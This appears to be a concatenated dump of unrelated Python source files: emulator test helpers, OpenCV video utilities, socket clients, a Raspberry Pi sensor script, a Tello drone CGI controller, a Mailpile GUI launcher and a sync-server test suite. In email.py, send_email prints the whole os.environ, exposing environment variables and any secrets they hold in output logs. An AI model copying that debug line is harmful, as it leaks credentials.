_create_pubsub_subscription(client, project, queue['name'], queue['name'])
def with_cloud_emulators(*emulator_names):
"""Decorator for starting cloud emulators from a unittest.TestCase."""
def decorator(cls):
"""Decorator."""
class Wrapped(cls):
"""Wrapped class."""
@classmethod
def setUpClass(cls):
"""Class setup."""
for emulator_name in emulator_names:
if emulator_name not in _emulators:
_emulators[emulator_name] = start_cloud_emulator(emulator_name)
atexit.register(_emulators[emulator_name].cleanup)
if emulator_name == 'datastore':
ndb.get_context().set_memcache_policy(False)
ndb.get_context().set_cache_policy(False)
# Work around bug with App Engine datastore_stub_util.py relying on
# missing protobuf enum.
import googledatastore
googledatastore.PropertyFilter.HAS_PARENT = 12
super(Wrapped, cls).setUpClass()
def setUp(self):
for emulator in _emulators.itervalues():
emulator.reset()
super(Wrapped, self).setUp()
Wrapped.__module__ = cls.__module__
Wrapped.__name__ = cls.__name__
return Wrapped
return decorator
def set_up_pyfakefs(test_self):
"""Helper to set up Pyfakefs."""
test_self.setUpPyfakefs()
test_self.fs.add_real_directory(environment.get_config_directory())
def supported_platforms(*platforms):
"""Decorator for enabling tests only on certain platforms."""
def decorator(func): # pylint: disable=unused-argument
"""Decorator."""
return unittest.skipIf(environment.platform() not in platforms,
'Unsupported platform.')(
func)
return decorator
|
app_utils.py
|
# import the necessary packages
from threading import Thread
import datetime
import cv2
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getWidth(self):
# Get the width of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
def getHeight(self):
# Get the height of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
def getFPS(self):
# Get the frame rate of the frames
return int(self.stream.get(cv2.CAP_PROP_FPS))
def isOpen(self):
# Get the frame rate of the frames
return self.stream.isOpened()
def setFramePosition(self, framePos):
self.stream.set(cv2.CAP_PROP_POS_FRAMES, framePos)
def getFramePosition(self):
return int(self.stream.get(cv2.CAP_PROP_POS_FRAMES))
def getFrameCount(self):
return int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
|
network.py
|
from threading import Thread
import socket
import select
import time
import os
import clingo
import argparse
from PyQt5.QtCore import *
class VisualizerSocket(object):
def __init__(self, default_host = '127.0.0.1', default_port = 5000, socket_name = 'socket'):
self._host = default_host
self._port = default_port
self._s = None
self._timer = None
self._socket_name = socket_name
self._thread = None
self._parser = None
self._waiting = False
def __del__(self):
self.close()
def set_parser(self, parser):
self._parser = parser
def run_script(self, command, port = None):
self.close()
self._thread = Thread(target = lambda: os.system(command))
self._thread.start()
if port is not None:
self.connect('127.0.0.1', port)
def join(self, wait_time):
if self._thread is not None:
self._thread.join(wait_time)
self._thread = None
def run_connection(self):
if self._s is None:
return
if self._timer is not None:
self._timer.stop()
self._timer = QTimer()
self._timer.timeout.connect(self.receive)
self._timer.start(1000)
def connect(self, host = None, port = None):
if self.is_connected() and host == self._host and port == self._port:
return 0
if host is not None:
self._host = host
if port is not None:
self._port = port
self.close()
print('Try connection with '+ self._socket_name)
self._s = socket.socket()
connected = False
tryCount = 0
while not connected: #try to connect to the server
try:
self._s.connect((self._host, self._port))
connected = True
except(socket.error):
if tryCount >= 5:
print('Failed to connect with ' + self._socket_name)
self.close()
return -1
print('Failed to connect with ' + self._socket_name + ' \nRetrying in 2 sek')
time.sleep(2)
tryCount += 1
print('Connect with '+ self._socket_name)
return 0
def send(self, msg):
if self._s is None or msg is None:
return
if msg == '':
return
self._s.send(msg.encode('utf-8'))
pass
def done_step(self, step):
if self._s is None:
return
self._waiting = True
self._s.send(('%$done(' + str(step) + ').\n').encode('utf-8'))
def model_expanded(self, msg):
pass
def _receive_data(self):
breakLoop = False
data = ''
try:
ready = select.select([self._s], [], [], 0.1)
while (not breakLoop) and ready[0]:
new_data = self._s.recv(2048).decode()
if not new_data.find('\n') == -1 or new_data == '':
breakLoop = True
data += new_data
if ready[0] and new_data == '':
self.close()
return None
except socket.error as err:
print(err)
return data
def receive(self):
return
def run(self):
return
def close(self):
if self._timer is not None:
self._timer.stop()
if self._s is not None:
print('Close connection to ' + self._socket_name)
try:
self._s.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._s.close()
self._s = None
self.join(10)
def is_connected(self):
return self._s is not None
def script_is_running(self):
return self._thread is not None
def is_waiting(self):
return self._waiting
def get_host(self):
return self._host
def get_port(self):
return self._port
class SolverSocket(VisualizerSocket):
def __init__(self):
super(self.__class__, self).__init__('127.0.0.1', 5000, 'solver')
self._model = None
def set_model(self, model):
self._model = model
if model is not None:
self._model.add_socket(self)
def model_expanded(self, msg):
self.send(msg)
self._waiting = True
def receive(self):
if self._s is None or self._parser is None or self._model is None:
return -1
data = self._receive_data()
if data is None:
return
if data == '':
return
self._waiting = False
for str_atom in data.split('.'):
if len(str_atom) != 0 and not (len(str_atom) == 1 and str_atom[0] == '\n'):
if str_atom == '%$RESET':
self._parser.clear_model_actions(True)
else:
self._parser.on_atom(clingo.parse_term(str_atom))
self._model.update_windows()
def solve(self):
if self._s == None or self._model == None: return -1
self._s.send('%$RESET.'.encode('utf-8'))
self._model.set_editable(False)
self._model.restart()
for atom in self._model.to_init_str(): #send instance
atom = atom.replace('\n', '')
self._s.send(str(atom).encode('utf-8'))
self._s.send('\n'.encode('utf-8'))
self.run_connection()
def run(self):
self.solve()
class SimulatorSocket(VisualizerSocket):
def __init__(self):
super(self.__class__, self).__init__('127.0.0.1', 5001, 'simulator')
def receive(self):
if self._s is None or self._parser is None:
return -1
data = self._receive_data()
empty = True
reset = False
if data is None:
return
if data == '':
return
self._waiting = False
for str_atom in data.split('.'):
if len(str_atom) != 0 and not (len(str_atom) == 1 and str_atom[0] == '\n'):
if str_atom == '%$RESET':
self._parser.clear_model()
reset = True
empty = False
else:
self._parser.on_atom(clingo.parse_term(str_atom))
empty = False
if not empty:
self._parser.done_instance(reset)
def connect(self, host = None, port = None):
VisualizerSocket.connect(self, host, port)
self.run()
def run(self):
self.run_connection()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
import os
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
print os.environ
with app.app_context():
mail.send(msg)
#thr = Thread(target=send_async_email, args=[app, msg])
#thr.start()
#return thr
|
ultrasound.py
|
import time
import RPi.GPIO as GPIO
import datetime as dt
import math
import sys
from multiprocessing import Process, Value, Array
import Adafruit_DHT
import speed_of_sound
import kalman
x_est, error_est = kalman.kalman(0.02, 0.02, 0.01, 0.005, 0.0001)
c_in_us = Value('d', speed_of_sound.calculate_c(22, 50) / 1e6)
def update_c_in_us(c_in_us):
dht_sensor = Adafruit_DHT.DHT11
dht_pin = 14
initialized = False
while True:
relative_humidity, temperature = Adafruit_DHT.read_retry(dht_sensor, dht_pin)
if relative_humidity is not None and temperature is not None:
c = speed_of_sound.calculate_c(temperature, relative_humidity) / 1e6
if not initialized:
x_est, error_est = kalman.kalman(c, c, 0.1, 0.05, 0.001)
initialized = True
else:
x_est, error_est = kalman.kalman(c, x_est, error_est, 0.05, 0.001)
c_in_us.value = x_est
print('Temp=%.1fC Humidity=%.1f%% Mach 1=%.1fm/s ' % (temperature, relative_humidity, c_in_us.value * 1e6))
time.sleep(2)
temp_update = Process(target=update_c_in_us, args=(c_in_us,))
temp_update.start()
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.IN)
GPIO.output(2, GPIO.LOW)
max_wait_time = 120000
t_prev = dt.datetime.now()
mean = 0.2
variance = 0.005
while True:
t_start = dt.datetime.now()
# Wait for the ping cap to charge
time.sleep(0.01)
# Send the trigger signal for 10us
GPIO.output(2, GPIO.HIGH)
time.sleep(0.00001)
GPIO.output(2, GPIO.LOW)
# Time how long it takes for the echo signal to arrive
GPIO.wait_for_edge(3, GPIO.RISING, timeout = int(max_wait_time / 1000))
t0 = dt.datetime.now()
GPIO.wait_for_edge(3, GPIO.FALLING, timeout = int(max_wait_time / 1000))
t1 = dt.datetime.now()
# Echo timed out
if (t1 - t0).microseconds >= max_wait_time:
sys.stdout.buffer.write(b'Distance: inf+ \r')
sys.stdout.buffer.flush()
continue
# Calculate and print out the distance and sampling rate
t2 = (t1 - t0).microseconds
distance = t2 * 0.5 * c_in_us.value
#delta = distance - mean
#f = 0.05
#mean = (1-f) * mean + f * distance
#variance = (1-f) * variance + f * delta * delta
#process_variance = 0.001
x_est, error_est = kalman.kalman(distance, x_est, error_est, 0.005, 0.00001)
hz = 1000000 / ((t_start - t_prev).microseconds)
#sys.stdout.buffer.write(b'Distance: %.3f+-%.3f m (Raw: %.3f m, %d Hz, Mean: %.3f m, SD: %.3f) \r' % (x_est, error_est, distance, hz, mean, math.sqrt(variance)))
sys.stdout.buffer.write(b'%.3f m \r' % (x_est,))
sys.stdout.buffer.flush()
t_prev = t_start
finally:
GPIO.cleanup()
|
testDigitsReplacement.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from socket import *
import threading
import random
import time
import sys
import hashlib
import ssl
PROXY_ADDRESS = ('127.0.0.1', 8080)
PROXY_SSL = False
PROXY_MEGABYTES = 32
port = None
port_set_event = threading.Event()
test_path = "/what?ever=42"
test_header = "Whatever: 42"
body = "00 0000 0000 0000 0000 0000 00723333"
def server_thread_func():
global port, port_set_event
server = socket(AF_INET, SOCK_STREAM)
server.bind(('127.0.0.1', 0))
port = server.getsockname()[1]
port_set_event.set()
server.listen(1)
while True:
client, addr = server.accept()
print ("Serwer proxy połączony z serwerem docelowym")
tmp = client.recv(4096)
print(tmp)
client.send("HTTP/1.1 200 OK\r\n\r\n")
client.close()
def client_func():
client = socket(AF_INET, SOCK_STREAM)
client.connect(PROXY_ADDRESS)
if PROXY_SSL:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
conn = context.wrap_socket(client)
else:
conn = client
dest = "127.0.0.1:%d" % port
print ("Klient połączony z serwerem proxy")
headers = "Host: " + dest + "\r\nContent-Length: 36\r\n" + test_header + "\r\n"
conn.sendall("POST http://" + dest + test_path + " HTTP/1.1\r\n" + headers + "\r\n" + body)
print("Starting to receive data")
buf = ""
while True:
tmp = conn.recv(1048576)
if not tmp:
break
buf += tmp
print(buf)
client.close()
server_thread = threading.Thread(target=server_thread_func)
server_thread.daemon = True
server_thread.start()
port_set_event.wait()
client_func()
|
tello.py
|
#!/usr/bin/python3
import os
import threading
import socket
import time
import cgi
import cgitb
# import face_recognition
cgitb.enable()
print("Content-type:text/html\n")
form = cgi.FieldStorage()
command = form.getvalue("command")
class Tello(object):
def __init__(self):
self.tello_ip = '192.168.10.1'
self.command_port = 8889
self.state_port = 8890
self.video_port = 11111
self.socket_command = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_command.bind(('', self.command_port))
self.socket_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_video.bind(('', self.video_port))
self.socket_state = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_state.bind(('', self.state_port))
self.receive_command_thread = threading.Thread(target=self._receive_command_thread)
self.receive_command_thread.daemon = True
self.receive_command_thread.start()
self.receive_state_thread = threading.Thread(target=self._receive_state_thread)
self.receive_state_thread.daemon = True
self.receive_state_thread.start()
self.command_timeout = 3
self.response = None
self.state = None
self.raw_pic = "."+os.path.sep+"temp"+os.path.sep+"h2640.jpeg"
self.raw_vid = "."+os.path.sep+"temp"+os.path.sep+"h264"
# self.face_location = (0,0,0,0)
self.top = 220
self.bottom = 330
self.left= 330
self.right = 440
self.landoff_len = 220
self.send_command("command")
def __del__(self):
self.socket_command.close()
self.socket_state.close()
self.socket_video.close()
def _receive_command_thread(self):
while True:
try:
self.response, ip = self.socket_command.recvfrom(1024)
#print(self.response)
except socket.error as e:
print("Caught exception socket.error: {}".format(e))
def _receive_state_thread(self):
while True:
try:
self.state, ip = self.socket_state.recvfrom(1024)
break
except socket.error as e:
print("Caught exception socket.error: {}".format(e))
def send_command(self, command):
self.socket_command.sendto(command.encode('utf-8'), (self.tello_ip, self.command_port))
start = time.time()
n = 0
while self.response is None:
time.sleep(0.1)
n = n + 0.1
if n > self.command_timeout:
break
dur = time.time()-start
if self.response is None:
response = 'none_response'
else:
response = self.response.decode('utf-8')
self.response = None
print((command, response, dur))
return (command, response, dur)
def takeoff(self):
return self.send_command('takeoff')
def land(self):
return self.send_command('land')
def emergency(self):
return self.send_command('emergency')
def read_state(self, command):
"""
Args:
command (str): speed?, battery?, time?, height?, temp?, attitude?, baro?, acceleration?, tof?, wifi?
"""
return self.send_command("{}".format(command))
def move(self, direction, distance=20):
"""Moves in a direction for a distance
Args:
direction (str): 'forword', 'back', 'right', 'left', 'up', 'down'
distance (int): 20-500cm
"""
return self.send_command('{} {}'.format(direction, distance))
def rotate(self, direction='cw', degrees=90):
"""
Args:
direction (str): 'cw', 'ccw'
degrees (int): 1-3600
"""
return self.send_command('{} {}'.format(direction, degrees))
def flip(self, direction='f'):
"""
Args:
direction (str): 'l', 'r', 'f', 'b'
"""
return self.send_command('flip {}'.format(direction))
def go(self, x, y, z, speed):
"""
Args:
x,y,z (int): 20-500cm
speed (int): 10-100cm/s
"""
return self.send_command('go {} {} {}'.format(x,y,z,speed))
def curve(self, x1, y1, z1, x2, y2, z2, speed):
"""
Args:
x1,y1,z1,x2,y2,z2 (int): -500-500cm
speed: 10-60cm/s
坐标之差大于20
"""
return self.send_command('curve {} {} {} {} {} {} {}'.format(x1,y1,z1,x2,y2,z2,speed))
def set_speed(self, speed=10):
"""
Args:
speed (int): 10-100cm/s
"""
return self.send_command("speed {}".format(speed))
def set_wifi(self, pwd):
return self.send_command("wifi ssid {}".format(pwd))
def streamoff(self):
return self.send_command('streamoff')
def streamon(self):
return self.send_command('streamon')
def record(self, command):
with open('tello_commands', 'a') as f:
f.write(command+',')
def recall(self):
with open('tello_commands', 'r') as f:
commands = f.read().split(',')
return commands
def clear(self):
with open('tello_commands', 'w') as f:
f.write('')
def get_pic(self):
self.streamon()
begin = time.time()
packet_data = b""
while True:
try:
res_string, ip = self.socket_video.recvfrom(2048)
packet_data = b''.join([packet_data, res_string])
dur = time.time()-begin
if dur > 1:
with open(self.raw_vid, 'wb') as f:
f.write(packet_data)
os.system("ffmpeg -loglevel quiet -y -i {} -vf select='eq(pict_type\,I)' -vsync vfr {}".format(self.raw_vid, self.raw_pic))
# self.face_location = self.get_face_location(self.raw_pic)
break
except socket.error as exc:
print("Caught exception socket.error : %s" % exc)
# def get_face_other(self, imgname):
# img = face_recognition.load_image_file(imgname)
# face_landmarks = face_recognition.face_landmarks(img)
# face_encoding = face_recognition.face_encodings(img)
# return face_landmarks, face_encoding
# def get_face_location(self, imgname):
# top=bottom=left=right=0
# img = face_recognition.load_image_file(imgname)
# face_location = face_recognition.face_locations(img)
# face_num = len(face_location)
# if face_num > 0:
# top, right, bottom, left = face_location[0]
# return (top, bottom, left, right)
def cruise(self):
tello.get_pic()
while True:
tello.get_pic()
time.sleep(4)
# top,bottom,left,right = self.face_location
print((top,bottom,left,right))
if bottom-top > tello.landoff_len or top==bottom:
self.emergency()
break
else:
if top-tello.top > 10:
self.move('down')
if tello.top-top >10:
self.move("up")
if left-tello.left > 10:
self.move("right")
if tello.left - left > 10:
self.move("left")
if tello.landoff_len-(bottom-top) > 10:
self.move("forward")
start_time = time.time()
tello = Tello()
def run_command(command, record=True):
if command == "takeoff":
tello.takeoff()
if record:
tello.record(command)
elif command == "land":
tello.land()
if record:
tello.record(command)
elif command == "emergency":
tello.emergency()
if record:
tello.record(command)
elif command == "speed":
tello.read_state('speed?')
if record:
tello.record(command)
elif command == "battery":
tello.read_state('battery?')
if record:
tello.record(command)
elif command == "height":
tello.read_state('height?')
if record:
tello.record(command)
elif command == "temp":
tello.read_state('temp?')
if record:
tello.record(command)
elif command == "state":
print((command, tello.state))
if record:
tello.record(command)
elif command == 'forward':
tello.move('forward')
if record:
tello.record(command)
elif command == 'back':
tello.move('back')
if record:
tello.record(command)
elif command == 'left':
tello.move('left')
if record:
tello.record(command)
elif command == 'right':
tello.move('right')
if record:
tello.record(command)
elif command == "up":
tello.move("up")
if record:
tello.record(command)
elif command == "down":
tello.move('down')
if record:
tello.record(command)
elif command == "flip":
tello.flip()
if record:
tello.record(command)
elif command == 'rotate':
tello.rotate()
if record:
tello.record(command)
elif command == "go":
tello.go(20,20,20,10)
if record:
tello.record(command)
elif command == "curve":
tello.curve(20,0,0,0,20,0,10)
elif command == 'recall':
commands = tello.recall()
for command in commands:
run_command(command, False)
elif command == "clear":
tello.clear()
elif command == "pic":
tello.get_pic()
# top,bottom,left,right = tello.face_location
# print((top,bottom,left,right))
elif command == 'cruise':
tello.cruise()
else:
print("There is no such order")
print("({}, {})".format(command, time.time()-start_time))
run_command(command)
|
teradeep.py
|
import setproctitle #Set process name to something easily killable
from threading import Thread
import cv2
import os
import subprocess #so I can run subprocesses in the background if I want
#import ConfigParser #To read the config file modified by menu.py
from subprocess import call #to call a process in the foreground
import csv #To make an array of the certainty and identity results so we can find the top matches
import serial #To read audible distance of rangefinder
from operator import itemgetter
maxbotix = serial.Serial("/dev/ttyAMA0",baudrate=9600,timeout=5) #Open a serial input to recieve from the maxbotix ultrasonic rangefinder
class Teradeep:
def __init__(self, cam, cfg):
self.cam = cam
self.Config = cfg
self.teraframe = "/dev/shm/tera_frame" #Signal to the teradeep process that a frame is available
self.teraimg = "/dev/shm/teradeep.jpg" #The frame
self.classify = "/dev/shm/teradeep.txt"
self.teratext = "/dev/shm/tera_text" #Teradeep process creates this when text in classify can be fetched
self.running = False
def start(self):
# self.Config.read('/home/pi/aftersight.cfg')
# self.ConfigJetpacThreshold = float(self.Config.get('AfterSightConfigSettings','configjetpacthreshold')) #Set the identification threshold as a float
if (os.path.exists(self.teraframe)):
os.remove(self.teraframe)
if (os.path.exists(self.teraimg)):
os.remove(self.teraimg)
if (os.path.exists(self.teratext)):
os.remove(self.teratext)
if (os.path.exists(self.classify)):
os.remove(self.classify)
subprocess.Popen(["sudo","/home/pi/teradeep_opencv/teradeep_opencv","-m","/home/pi/teradeep_model/","-i","/dev/shm/teradeep.jpg"])
self.running = True
t = Thread(target=self.worker, args=())
t.start()
def worker(self):
while True:
if not self.running:
return
if (not os.path.exists(self.teraframe)):
res = cv2.resize(self.cam.read(), (640, 480), interpolation =cv2.INTER_AREA)
cv2.imwrite(self.teraimg, res)
os.mknod(self.teraframe)
continue
if (os.path.exists(self.teratext)):
data = csv.reader(open('/dev/shm/teradeep.txt', 'rb'), delimiter=" ", quotechar='|')
certainty, identity = [], []
for row in data:
certainty.append(row[0])
identity.append(row[1])
certainty = [float(i) for i in certainty] # Convert Certainty from string to float to allow sorting
matrix = zip(certainty, identity) #combine them into a two dimentional list
matrix.sort(key=itemgetter(0), reverse=True) #Sort Highest to Lowest Based on Certainty
#Now Espeak the top three terms if they are > threshold
topthreeidentity = [x[1] for x in matrix[0:3]]
topthreecertainty = [x[0] for x in matrix[0:3]]
if topthreecertainty[0] > float(self.Config.ConfigTeradeepThreshold):
FirstItem = str(topthreeidentity[0])
print topthreecertainty[0], topthreeidentity[0]," 1st item Greater Than Threshold"
else:
FirstItem = "Nothing Recognized"
print "Top item underthreshold"
if topthreecertainty[1] > float(self.Config.ConfigTeradeepThreshold):
SecondItem = str(topthreeidentity[1])
print topthreecertainty[1], topthreeidentity[1], " 2nd item Greater Than Threshold"
else:
SecondItem = " "
print "Second Item Under Threshold"
if topthreecertainty[2] > float(self.Config.ConfigTeradeepThreshold):
ThirdItem = str(topthreeidentity[2])
print topthreecertainty[2], topthreeidentity[2], " 3rd item Greater Than Threshold"
else:
ThirdItem = " "
espeakstring = FirstItem + ", " + SecondItem + ", " + ThirdItem # read top three, commas to make a small pause
if self.Config.ConfigAudibleDistance == True:
maxbotix.flushInput() #clear buffer to get fresh values if you don't do this, you won't get responsive readings
currdistance = maxbotix.readline(10) #Take ten characters worth of the serial buffer that accumulates since the$
stripstart = currdistance.find("R") #Look for the character "R", find out where it occurs in the string first
stripend = stripstart + 5 #Define the end of the character length we need to grab the numeric info
currdistance = currdistance[stripstart+1:stripend] #strip out the numeric info
currmm = float(currdistance) #Now make the info a number instead of a string
#print "Current mm", currmm
currm = currmm/100 #convert millimeters to deciimeters
#print "Convert mm to dm", currm
currm = int(currm) #strip decimals
#print "Strip Decimals", currm
currm = float(currm) #Go back to being allowed decimals
#print "Allow Decimals again", currm
currm = currm/10 #convert to meters with one decimal place
#print "now go from deciimeters to meters", currm
currm = str(currm) #convert float to text for reading
print "meters ", currm
espeakstring = espeakstring + currm + " Meters"
# topthree = [x[1] for x in matrix[0:3]]
# espeakstring = str(topthree[0]) + ", " + str(topthree[1]) + ", " + str(topthree[2])
espeak_process = subprocess.Popen(["espeak",espeakstring, "--stdout"], stdout=subprocess.PIPE)
subprocess.Popen(["aplay", "-D", "sysdefault"], stdin=espeak_process.stdout, stdout=subprocess.PIPE)
call (["sudo","rm","-rf","/dev/shm/teradeep.txt"]) #remove last run of classification info
os.remove(self.teratext)
def stop(self):
self.running = False
call (["sudo","killall","teradeep_opencv"]) #Kills Teradeep C++ loop
|
gui.py
|
import json
import os
import sys
import threading
import time
import webbrowser
import mailpile.auth
import mailpile.util
from mailpile.commands import Quit
from mailpile.i18n import gettext as _
from mailpile.safe_popen import Popen, PIPE, MakePopenSafe, MakePopenUnsafe
from mailpile.ui import Session
from mailpile.util import *
__GUI__ = None
def indicator(command, **kwargs):
__GUI__.stdin.write('%s %s\n' % (command, json.dumps(kwargs)))
def startup(config):
if sys.platform in ('darwin', ) or os.getenv('DISPLAY'):
th = threading.Thread(target=_real_startup, args=[config])
th.name = 'GUI'
th.daemon = True
th.start()
def output_eater(fd, buf):
for line in fd:
buf.append(line)
def _real_startup(config):
while config.http_worker is None:
time.sleep(0.1)
try:
session_id = config.http_worker.httpd.make_session_id(None)
mailpile.auth.SetLoggedIn(None, user='GUI plugin client',
session_id=session_id)
cookie = config.http_worker.httpd.session_cookie
sspec = config.http_worker.httpd.sspec
base_url = 'http://%s:%s' % sspec
script_dir = os.path.dirname(os.path.realpath(__file__))
script = os.path.join(script_dir, 'gui-o-matic.py')
global __GUI__
gui = __GUI__ = Popen(['python', '-u', script],
bufsize=1, # line buffered
stdin=PIPE, stderr=PIPE,
long_running=True)
stderr = []
eater = threading.Thread(target=output_eater,
args=[gui.stderr, stderr])
eater.name = 'GUI(stderr)'
eater.daemon = True
eater.start()
ico = lambda s: os.path.join(script_dir, 'icons-%(theme)s', s)
gui.stdin.write(json.dumps({
'app_name': 'Mailpile',
'indicator_icons': {
'startup': ico('startup.png'),
'normal': ico('normal.png'),
'working': ico('working.png'),
'attention': ico('attention.png'),
'shutdown': ico('shutdown.png')
},
'indicator_menu': [
{
'label': _('Starting up ...'),
'item': 'status'
},{
'label': _('Open Mailpile'),
'item': 'open',
'op': 'show_url',
'args': [base_url]
},{
'label': _('Quit'),
'item': 'quit',
'op': 'get_url',
'args': [base_url + '/api/0/quitquitquit/']
}
],
'http_cookies': {
base_url: [[cookie, session_id]]
},
}).strip() + '\nOK GO\n')
indicator('set_menu_sensitive', item='quit')
indicator('set_menu_sensitive', item='open')
# FIXME: This sleep is lame
time.sleep(5)
if (gui.poll() is not None) or mailpile.util.QUITTING:
return
except:
# If the basic indicator setup fails, we just assume it doesn't
# work and go silently dead...
return
quitting = False
try:
# ...however, getting this far means if the indicator dies, then
# the user tried to quit the app, so we should cooperate and die
# (via the except below).
while config.index is None or not config.tags:
if mailpile.util.QUITTING:
return
if gui.poll() is not None:
return
time.sleep(1)
indicator('set_status_normal')
# FIXME: We should do more with the indicator... this is a bit lame.
while True:
if mailpile.util.QUITTING:
quitting = True
indicator('set_status_shutdown')
indicator('set_menu_sensitive', item='open', sensitive=False)
indicator('set_menu_sensitive', item='quit', sensitive=False)
indicator('set_menu_label',
item='status',
label=_('Shutting down...'))
l = threading.Lock()
l.acquire()
l.acquire() # Deadlock, until app quits
else:
indicator('set_menu_label',
item='status',
label=_('%d messages') % len(config.index and
config.index.INDEX or []))
time.sleep(1)
except AttributeError:
pass
finally:
try:
if not quitting:
Quit(Session(config)).run()
except:
pass
|
tests.py
|
#!env/bin/python
"""Tucker Sync test module.
Main test suite for the algorithm, server and client.
WARNING:
DATA LOSS!
Do not run tests against a production database with live data.
All database tables will be dropped and then created after tests.
Leaving the database ready for production with fresh tables.
Remote server:
Functional and integration tests are designed to execute against a running
local or remote server. Since there is no RPC (remote procedure call) to
drop-create all tables and an open connection to a remote database is not
expected this module cannot clean the database of a remote server.
- Use the --remote-server test option.
- On the remote server clean the database with `app_setup.py --only-tables`
Unit tests require direct access to the local modules and database
precluding their use in testing remote installations.
Usage:
tests.py [-h] [--remote-server] [--baseurl BASEURL] [-k K]
Optional arguments:
-h, --help show this help message and exit
--remote-server use when running against a remote server
--baseurl BASEURL specify the server base url
-k K only run tests which match the given substring expression
Usage examples:
./tests.py
./tests.py --help
./tests.py --baseurl "http://0.0.0.0:8080/"
./tests.py -k "TestIntegration or TestMultiple"
./tests.py --baseurl "http://0.0.0.0:8080/" -k "TestServer and not sync"
License:
The MIT License (MIT), see LICENSE.txt for more details.
Copyright:
Copyright (c) 2014 Steven Tucker and Gavin Kromhout.
"""
import argparse
import pytest
import requests
import uuid
from flexmock import flexmock
from requests.exceptions import ConnectionError
from werkzeug.exceptions import MethodNotAllowed, NotImplemented, BadRequest
import client
import server
import app_model
from common import APIRequestType, HTTP, JSON, APIRequest, APIErrorResponse, \
JSONKey, APIErrorCode, SyncDownRequestBody, AccountOpenRequestBody, \
SyncUpRequestBody, SyncCount
from app_config import APP_KEYS
fixture = pytest.fixture
parametrize = pytest.mark.parametrize
use_fixtures = pytest.mark.usefixtures
yield_fixture = pytest.yield_fixture
class TestCommon(object):
"""Common unit tests."""
def test_api_error_response(self):
assert '{"error":0}' == APIErrorResponse.SUCCESS
assert '{"error":1}' == APIErrorResponse.INTERNAL_SERVER_ERROR
assert '{"error":2}' == APIErrorResponse.MALFORMED_REQUEST
@use_fixtures('session_fin_drop_create_tables')
class TestServerUnit(object):
"""Server unit tests.
Running server not required for unit tests.
However connection to a running database is required."""
@yield_fixture
def holder(self):
holder = server.Holder()
holder.response = server.Response()
holder.cursor, holder.cnx, errno = server.open_db()
assert not errno
holder.object_class = app_model.Product
yield holder
# finalization
server.close_db(holder.cursor, holder.cnx)
@use_fixtures('before_test_drop_create_tables')
def test_warn_expired_sessions_committed(self, holder, caplog):
"""Test logged warning when expired sessions are committed."""
from test_sync_count import insert_expired_and_current_sessions
insert_expired_and_current_sessions()
server.mark_expired_sessions_committed(holder)
logged_msg = SyncCount.WARN_EXPIRED_SESSIONS_COMMITTED % 4
assert logged_msg in caplog.text()
count = 0
for record in caplog.records():
if record.getMessage() == logged_msg:
assert 'WARNING' == record.levelname
count += 1
assert 1 == count
@use_fixtures("session_fin_drop_create_tables")
class TestServer(object):
"""Server functional tests.
base_url is a test fixture defined in conftest.py
"""
@fixture(scope='class')
def account_open_request_body(self):
rb = AccountOpenRequestBody()
rb.clientUUID = uuid.uuid4()
return rb
@fixture(scope='class')
def sync_down_request_body(self, account_open_request_body):
rb = SyncDownRequestBody()
rb.objectClass = 'Product'
rb.clientUUID = account_open_request_body.clientUUID
rb.lastSync = 0
return rb
@fixture(scope='class')
def sync_up_request_body(self, account_open_request_body):
rb = SyncUpRequestBody()
rb.objectClass = 'Product'
rb.clientUUID = account_open_request_body.clientUUID
rb.objects = []
return rb
@fixture
def req(self, base_url):
req = APIRequest()
req.base_url = base_url
req.type = APIRequestType.TEST
req.key = APP_KEYS[1]
req.email = 'user@example.com'
req.password = 'secret78901234'
return req
METHODS_NOT_ALLOWED = ('', ' ',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL',
'OPTIONS', 'GET', 'HEAD', 'PUT',
'PATCH', 'DELETE', 'TRACE', 'CONNECT')
@parametrize('method', METHODS_NOT_ALLOWED)
def test_method_not_allowed(self, req, method):
"""Test server base url for method not allowed responses."""
def assert_method_not_allowed():
assert MethodNotAllowed.code == response.status_code
if method != 'TRACE':
assert 'POST' == response.headers.get('Allow')
if method != 'HEAD':
assert 'Method Not Allowed' in response.content
try:
response = requests.request(method, req.base_url,
headers=req.base_headers)
except ConnectionError:
# For some of the methods PHP CLI may get no further than this.
